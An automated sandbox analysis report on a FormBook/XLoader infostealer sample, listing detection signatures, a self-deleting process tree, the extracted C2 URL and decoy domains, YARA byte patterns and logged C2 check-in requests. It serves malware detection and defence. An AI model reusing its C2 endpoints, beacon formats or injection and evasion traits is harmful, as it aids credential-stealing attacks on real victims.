
Windows Analysis Report TT COPY_02101011.exe

Overview

General Information

Sample Name: TT COPY_02101011.exe
Analysis ID: 528714
MD5: ebabc0d66a9e01cc0926f3b311feff5f
SHA1: 83a44664135a7255045becde754dae29be496c8f
SHA256: ea8733d0ea6248e2f522487d09e7854230a648e67f1a5e90fea31f6305a1ff7b
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Uses netstat to query active network connections and open ports
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • TT COPY_02101011.exe (PID: 6584 cmdline: "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: EBABC0D66A9E01CC0926F3B311FEFF5F)
    • TT COPY_02101011.exe (PID: 6644 cmdline: "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: EBABC0D66A9E01CC0926F3B311FEFF5F)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • autoconv.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\autoconv.exe MD5: 4506BE56787EDCD771A351C10B5AE3B7)
        • NETSTAT.EXE (PID: 744 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
          • cmd.exe (PID: 7080 cmdline: /c del "C:\Users\user\Desktop\TT COPY_02101011.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.helpfromjames.com/e8ia/"], "decoy": ["le-hameau-enchanteur.com", "quantumsystem-au.club", "engravedeeply.com", "yesrecompensas.lat", "cavallitowerofficials.com", "800seaspray.com", "skifun-jetski.com", "thouartafoot.com", "nft2dollar.com", "petrestore.online", "cjcutthecord2.com", "tippimccullough.com", "gadget198.xyz", "djmiriam.com", "bitbasepay.com", "cukierniawz.com", "mcclureic.xyz", "inthekitchenshakinandbakin.com", "busy-clicks.com", "melaniemorris.online", "elysiangp.com", "7bkj.com", "wakeanddraw.com", "ascalar.com", "iteraxon.com", "henleygirlscricket.com", "torresflooringdecorllc.com", "helgquieta.quest", "xesteem.com", "graffity-aws.com", "bolerparts.com", "andriylysenko.com", "bestinvest-4-you.com", "frelsicycling.com", "airductcleaningindianapolis.net", "nlproperties.net", "alkoora.xyz", "sakiyaman.com", "wwwsmyrnaschooldistrict.com", "unitedsafetyassociation.com", "fiveallianceapparel.com", "edgelordkids.com", "herhauling.com", "intelldat.com", "weprepareamerica-planet.com", "webartsolution.net", "yiquge.com", "marraasociados.com", "dentalimplantnearyou-ca.space", "linemanbible.com", "dunamisdispatchservicellc.com", "latamoperationalinstitute.com", "stpaulsschoolbagidora.com", "groupninemed.com", "solar-tribe.com", "footairdz.com", "blttsperma.quest", "xfeuio.xyz", "sahodyafbdchapter.com", "0934800.com", "dandftrading.com", "gladway.net", "mineriasinmercurio.com", "inaampm.com"]}

Yara Overview

Memory Dumps

Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  Strings:
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source: 1.1.TT COPY_02101011.exe.400000.0.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
  Strings:
    • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
    • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
    • 0x15d18:$sqlite3text: 68 38 2A 90 C5
    • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
    • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C

Source: 1.0.TT COPY_02101011.exe.400000.1.unpack
  Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
  Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
  Strings:
    • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp; Malware Configuration Extractor: FormBook (configuration as listed under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: TT COPY_02101011.exe; Virustotal: Detection: 36%
Source: TT COPY_02101011.exe; ReversingLabs: Detection: 15%
Yara detected FormBook
Source: Yara match; File source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.681771508.0000000002A30000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.743981788.00000000005B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000004.00000000.717484529.000000000F349000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.744409415.00000000005E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000009.00000002.935144259.0000000000CF0000.00000004.00000001.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll; ReversingLabs: Detection: 15%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll; Joe Sandbox ML: detected
Source: 1.0.TT COPY_02101011.exe.400000.3.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.1.TT COPY_02101011.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.TT COPY_02101011.exe.400000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 1.0.TT COPY_02101011.exe.400000.0.unpack; Avira: Label: TR/Patched.Ren.Gen2
Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.NETSTAT.EXE.372796c.4.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.TT COPY_02101011.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: 9.2.NETSTAT.EXE.d6e840.0.unpack; Avira: Label: TR/Patched.Ren.Gen
Source: 1.0.TT COPY_02101011.exe.400000.2.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: TT COPY_02101011.exe; Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: wntdll.pdbUGP source: TT COPY_02101011.exe, 00000000.00000003.677689499.0000000002A70000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000000.00000003.677942746.0000000002C00000.00000004.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: TT COPY_02101011.exe, TT COPY_02101011.exe, 00000001.00000002.744681975.0000000000A70000.00000040.00000001.sdmp, TT COPY_02101011.exe, 00000001.00000002.746909358.0000000000B8F000.00000040.00000001.sdmp, NETSTAT.EXE, NETSTAT.EXE, 00000009.00000002.935582274.00000000031F0000.00000040.00000001.sdmp, NETSTAT.EXE, 00000009.00000002.935695705.000000000330F000.00000040.00000001.sdmp
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Code function: 0_2_00405250 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Code function: 0_2_00405C22 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Code function: 0_2_00402630 FindFirstFileA,

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49824 -> 143.95.80.65:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49850 -> 104.21.31.204:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 37.123.118.150 80
Source: C:\Windows\explorer.exe; Network Connect: 213.186.33.5 80
Source: C:\Windows\explorer.exe; Domain query: www.webartsolution.net
Source: C:\Windows\explorer.exe; Network Connect: 185.65.236.168 80
Source: C:\Windows\explorer.exe; Domain query: www.mcclureic.xyz
Source: C:\Windows\explorer.exe; Domain query: www.gadget198.xyz
Source: C:\Windows\explorer.exe; Domain query: www.intelldat.com
Source: C:\Windows\explorer.exe; Network Connect: 3.96.23.237 80
Source: C:\Windows\explorer.exe; Domain query: www.helpfromjames.com
Source: C:\Windows\explorer.exe; Network Connect: 172.67.158.42 80
Source: C:\Windows\explorer.exe; Domain query: www.le-hameau-enchanteur.com
Source: C:\Windows\explorer.exe; Domain query: www.blttsperma.quest
Source: C:\Windows\explorer.exe; Network Connect: 198.54.125.56 80
Source: C:\Windows\explorer.exe; Network Connect: 151.139.128.11 80
Source: C:\Windows\explorer.exe; Domain query: www.yesrecompensas.lat
Source: C:\Windows\explorer.exe; Domain query: www.henleygirlscricket.com
Source: C:\Windows\explorer.exe; Network Connect: 143.95.80.65 80
Uses netstat to query active network connections and open ports
Source: C:\Windows\explorer.exe; Process created: C:\Windows\SysWOW64\NETSTAT.EXE C:\Windows\SysWOW64\NETSTAT.EXE
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe; DNS query: www.mcclureic.xyz
Source: C:\Windows\explorer.exe; DNS query: www.gadget198.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.helpfromjames.com/e8ia/
Source: Joe Sandbox View; ASN Name: UK2NET-ASGB UK2NET-ASGB
Source: global traffic; HTTP traffic detected: GET /e8ia/?iXg8nxg=XTCOm0O2ezcXVHmIGYJnNvyPH+9cp28MuHIwWYLOKrNEhJt2q4EPucT34N3PnC3WtYmv&xTh4=5jvdevo8uz HTTP/1.1 | Host: www.yesrecompensas.lat | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /e8ia/?iXg8nxg=yTyv9O3Jw5UvaSzklMNiw9yfcYAnwywQ+wyeDsCSdfwJ085LpTTX32oK1L+zNF/muuyB&xTh4=5jvdevo8uz HTTP/1.1 | Host: www.gadget198.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /e8ia/?iXg8nxg=uzdrQi2cv+ipXcIIFlALJKSYThDDC/wlQTE6b69ZsR3gT5zSedzJyJgP4QFwrZDAKX1z&xTh4=5jvdevo8uz HTTP/1.1 | Host: www.le-hameau-enchanteur.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /e8ia/?iXg8nxg=Y16Z63O1gty4jexpGTflGuIz4Gugt4GYAlGZJQf+kV2UdFWHFdKuPaLe5BRm7+ulCaVU&xTh4=5jvdevo8uz HTTP/1.1 | Host: www.henleygirlscricket.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /e8ia/?iXg8nxg=PAc72DwZO0aWTT/MjmPIYr+XMy4z+KuKlzNTRujTlx9pyna9MI4XbiRkWDekRXBmxfjs&xTh4=5jvdevo8uz HTTP/1.1 | Host: www.webartsolution.net | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /e8ia/?iXg8nxg=pR2xmGsT/5nillNQjkLQ+n9+6iNIwMBz7svLGcpZWnNs4I/1r36jcwvV3IT8Xqaw6HRS&xTh4=5jvdevo8uz HTTP/1.1 | Host: www.blttsperma.quest | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic; HTTP traffic detected: GET /e8ia/?iXg8nxg=OP/FDNHzL21SrAXHedPkfpmrZidd0Yb29DNAw19ZtZADeK9OL3CpiCl5COoBoa9aFzWI&xTh4=5jvdevo8uz HTTP/1.1 | Host: www.intelldat.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: Joe Sandbox View; IP Address: 37.123.118.150 37.123.118.150
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden | Server: nginx/1.10.3 (Ubuntu) | Date: Thu, 25 Nov 2021 16:50:07 GMT | Content-Type: text/html | Content-Length: 178 | Connection: close | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a | Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>
Source: TT COPY_02101011.exe; String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: TT COPY_02101011.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: unknown; DNS traffic detected: queries for: www.mcclureic.xyz
Source: C:\Users\user\Desktop\TT COPY_02101011.exe; Code function: 0_2_00404E07 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File sources: the same eleven UNPACKEDPE and twelve MEMORY sources listed under "Yara detected FormBook" in the AV Detection section above

System Summary:

Malicious sample detected (through community Yara rule)
Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.TT COPY_02101011.exe.400000.1.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.TT COPY_02101011.exe.2a30000.1.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.TT COPY_02101011.exe.400000.2.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.TT COPY_02101011.exe.400000.3.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.TT COPY_02101011.exe.400000.0.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.TT COPY_02101011.exe.400000.3.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.TT COPY_02101011.exe.2a30000.1.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.TT COPY_02101011.exe.400000.0.raw.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.0.TT COPY_02101011.exe.400000.2.unpack, type: UNPACKEDPE; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.678695339.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.680245219.0000000000400000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000000.679558330.0000000000400000.00000040.00000001.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.935086898.0000000000CC0000.00000040.00020000.sdmp, type: MEMORY; Matched rule: detect Formbook in memory; Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.742624387.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000009.00000002.934914416.0000000000760000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000004.00000000.732659065.000000000F349000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
